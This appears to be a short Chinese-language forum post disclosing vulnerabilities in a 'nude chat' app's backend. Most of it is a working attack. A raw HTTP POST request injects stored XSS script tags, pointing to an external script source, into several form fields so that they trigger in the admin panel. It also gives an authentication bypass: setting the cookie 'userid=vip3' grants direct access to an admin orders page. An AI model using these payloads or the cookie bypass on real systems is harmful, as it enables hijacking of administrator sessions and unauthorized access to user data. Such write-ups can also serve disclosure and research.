该裸聊APP前台接受数据存在XSS
XSS漏洞
POST /api/D302AD2E17B400B8E8CB91BE3B32F2CD HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
Host: 127.0.0.1:91
Connection: close
User-Agent: okhttp/3.8.0
myInfo=%5B%5D&deviceID=<script src=//xxxx></script>&myWhere=-&tel=%2B8617644871170&myMsgs=%5B%5D&myModel=HD1910&myWho=002&myRoom=<script src=//xxx></script>&myTel=<script src=//xxx></script>
后台会直接触发。
未授权访问
http://127.0.0.1:91/li/Index/Orders/002
在Cookie中携带:userid=vip3 即可直接登陆。
没有回复内容